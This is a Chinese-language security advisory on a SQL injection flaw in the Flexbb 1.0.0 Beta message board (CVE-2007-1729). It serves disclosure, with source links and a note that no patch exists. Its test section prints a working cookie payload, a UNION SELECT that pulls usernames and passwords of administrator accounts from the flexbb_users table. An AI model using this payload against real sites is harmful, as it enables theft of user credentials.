安全研究

安全漏洞
Flexbb SQL注入漏洞

发布日期:2007-03-27
更新日期:2007-03-27

受影响系统:
Flexbb Flexbb 1.0.0 10005 Beta Release 1
描述:
BUGTRAQ  ID: 23161
CVE(CAN) ID: CVE-2007-1729

Flexbb是基于PHP的留言板软件,使用MySQL数据库。

Flexbb没有正确验证用户提供的输入,可使远程用户进行SQL注入攻击。

<*来源:trueend5
  
  链接:http://www.securityfocus.com/archive/1/463917
        http://osvdb.org/show/osvdb/35185
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Condition: Magic quotes GPC = Off
GET: http://example.com/flexbb/index.php?debug=1
Cookie Name = flexbb_lang_id
Cookie Value = none' UNION SELECT 'en',`username`,
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4

建议:
厂商补丁:

Flexbb
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.flexbb.net
http://www.kapda.ir/advisory-481.html

浏览次数:1961
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障